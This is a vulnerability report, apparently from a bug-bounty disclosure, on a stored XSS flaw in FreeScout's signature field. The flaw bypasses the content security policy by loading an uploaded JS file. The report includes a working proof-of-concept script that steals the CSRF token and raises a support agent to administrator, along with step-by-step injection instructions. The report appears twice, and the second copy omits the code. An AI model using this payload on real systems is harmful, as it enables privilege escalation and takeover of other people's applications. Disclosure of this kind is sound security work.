Description:
A Stored Cross-Site Scripting (XSS) vulnerability has been identified within the Signature Input Field of the FreeScout Application. Stored XSS occurs when user input is not properly sanitized and is stored on the server, allowing an attacker to inject malicious scripts that will be executed when other users access the affected page. In this case, the Support Agent User can inject malicious scripts into their signature, which will then be executed when viewed by the Administrator.
The application protects users against XSS attacks by enforcing a CSP policy, the CSP Policy is: "script-src 'self' 'nonce-abcd' ". The CSP policy only allows the inclusion of JS files that are present on the application server and doesn't allow any inline script or script other than nonce-abcd.
The CSP policy was bypassed by uploading a JS file to the server by a POST request to /conversation/upload endpoint. After this, a working XSS payload was crafted by including the uploaded JS file link as the src of the script. The crafted payload is like the following:
<script src="http://127.0.0.1/storage/attachment/8/1/1/StoredXSS_PrivEsc.js?id=7&token=c4786c4497db3c6254a0c310623a43c3"></script>
This bypassed the CSP policy and XSS attacks became possible.
By exploiting this vulnerability, an attacker can force the Administrator to perform actions without the administrator even noticing anything suspicious. In one scenario, I made an exploit that forced the administrator to add an attacker-controlled Administrator into the FreeScout Application, resulting in a compromise of the Freescout Application. In another exploit, I was able to force an administrator to change the role of an attacker-controlled low-privileged (Support Agent) User to the administrator role.
Impact:
The impact of this vulnerability is severe as it allows an attacker to compromise the FreeScout Application. By exploiting this vulnerability, the attacker can perform various malicious actions such as forcing the Administrator to execute actions without their knowledge or consent. For instance, the attacker can force the Administrator to add a new administrator controlled by the attacker, thereby giving the attacker full control over the application. Alternatively, the attacker can elevate the privileges of a low-privileged user to Administrator, further compromising the security of the application.
Attackers can steal sensitive information such as login credentials, session tokens, personal identifiable information (PII), and financial data.
The vulnerability can also lead to defacement of the Application.
Mitigation:
Implement thorough input validation and sanitization mechanisms on all user inputs, including the Signature Input Field. This will help prevent malicious scripts from being stored and executed. On processing the inputs in the signature input on the server side, verify that only whitelisted tags are allowed. All other tags like the script, iframe, form, etc must not be allowed.
Steps to Reproduce:
The video is also Attached.
- Enable Editing Signature Permission for Users.
Preparing Malicious JS file for Privilege Escalation:
- Replace 2 with the userID of the attacker-controlled user. Also, replace yldrmhacker2@gmail.com email with the attacker-controlled user's email.
var metaTag = document.querySelector('meta[name="csrf-token"]');
var csrfToken = metaTag.getAttribute('content');
const url = location.origin+'/users/profile/2';
const body = '_token='+csrfToken+'&role=2&first_name=a&last_name=a&email=yldrmhacker2@gmail.com&emails=&job_title=&phone=&locale=en&timezone=Pacific%2fSamoa&time_format=2&photo_url=';
const options = {
method: 'POST',
body: body,
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
};
fetch(url, options);
alert('Ha Ha! Your FreeScout Application Has been completely Compromised');
Attacker Steps:
3. Login as a support agent (user).
4. Go to a conversation.
5. In adding a note, upload the malicious JS file.
6. Note the URL of the uploaded JS file.
7. Go to editing Signature.
8. Input abcd.
9. Turn on intercept in Burp Suite.
10. In the request, at the end of the parameter's value add the following XSS payload:
<script src="{JS_File_Link}"></script>
11. Turn off the intercept.
Victim Steps:
12. Login as an administrator.
13. Go to any conversation, XSS payload will be executed and a popup will appear showing that the Application has been compromised.
Attacker Step:
14. Back at Attacker's account, Refresh the webpage.
15. The User's privileges will have been elevated to Administrator.
Evidence:
The attacker-controlled User.
User uploads JS file.
User edits email signature and injects XSS payload.
Administrator goes to Any conversation. XSS Payload for Privilege Escalation is executed. An alert message is also shown.
Attacker user's privileges are elevated to Administrator.
Video Link: https://drive.google.com/file/d/1Jz8PcQgpF2gZfbmMGsACfGl4fY3U8c9C/view?usp=sharing
Description:
A Stored Cross-Site Scripting (XSS) vulnerability has been identified within the Signature Input Field of the FreeScout Application. Stored XSS occurs when user input is not properly sanitized and is stored on the server, allowing an attacker to inject malicious scripts that will be executed when other users access the affected page. In this case, the Support Agent User can inject malicious scripts into their signature, which will then be executed when viewed by the Administrator.
The application protects users against XSS attacks by enforcing a CSP policy, the CSP Policy is: "script-src 'self' 'nonce-abcd' ". The CSP policy only allows the inclusion of JS files that are present on the application server and doesn't allow any inline script or script other than nonce-abcd.
The CSP policy was bypassed by uploading a JS file to the server by a POST request to /conversation/upload endpoint. After this, a working XSS payload was crafted by including the uploaded JS file link as the src of the script. The crafted payload is like the following:
<script src="http://127.0.0.1/storage/attachment/8/1/1/StoredXSS_PrivEsc.js?id=7&token=c4786c4497db3c6254a0c310623a43c3"></script>
This bypassed the CSP policy and XSS attacks became possible.
By exploiting this vulnerability, an attacker can force the Administrator to perform actions without the administrator even noticing anything suspicious. In one scenario, I made an exploit that forced the administrator to add an attacker-controlled Administrator into the FreeScout Application, resulting in a compromise of the Freescout Application. In another exploit, I was able to force an administrator to change the role of an attacker-controlled low-privileged (Support Agent) User to the administrator role.
Impact:
The impact of this vulnerability is severe as it allows an attacker to compromise the FreeScout Application. By exploiting this vulnerability, the attacker can perform various malicious actions such as forcing the Administrator to execute actions without their knowledge or consent. For instance, the attacker can force the Administrator to add a new administrator controlled by the attacker, thereby giving the attacker full control over the application. Alternatively, the attacker can elevate the privileges of a low-privileged user to Administrator, further compromising the security of the application.
Attackers can steal sensitive information such as login credentials, session tokens, personal identifiable information (PII), and financial data.
The vulnerability can also lead to defacement of the Application.
Mitigation:
Implement thorough input validation and sanitization mechanisms on all user inputs, including the Signature Input Field. This will help prevent malicious scripts from being stored and executed. On processing the inputs in the signature input on the server side, verify that only whitelisted tags are allowed. All other tags like the script, iframe, form, etc must not be allowed.
Steps to Reproduce:
The video is also Attached.
Preparing Malicious JS file for Privilege Escalation:
Attacker Steps:
3. Login as a support agent (user).
4. Go to a conversation.
5. In adding a note, upload the malicious JS file.
6. Note the URL of the uploaded JS file.
7. Go to editing Signature.
8. Input abcd.
9. Turn on intercept in Burp Suite.
10. In the request, at the end of the parameter's value add the following XSS payload:
<script src="{JS_File_Link}"></script>
11. Turn off the intercept.
Victim Steps:
12. Login as an administrator.
13. Go to any conversation, XSS payload will be executed and a popup will appear showing that the Application has been compromised.
Attacker Step:
14. Back at Attacker's account, Refresh the webpage.
15. The User's privileges will have been elevated to Administrator.
Evidence:
The attacker-controlled User.
User uploads JS file.
User edits email signature and injects XSS payload.
Administrator goes to Any conversation. XSS Payload for Privilege Escalation is executed. An alert message is also shown.
Attacker user's privileges are elevated to Administrator.
Video Link: https://drive.google.com/file/d/1Jz8PcQgpF2gZfbmMGsACfGl4fY3U8c9C/view?usp=sharing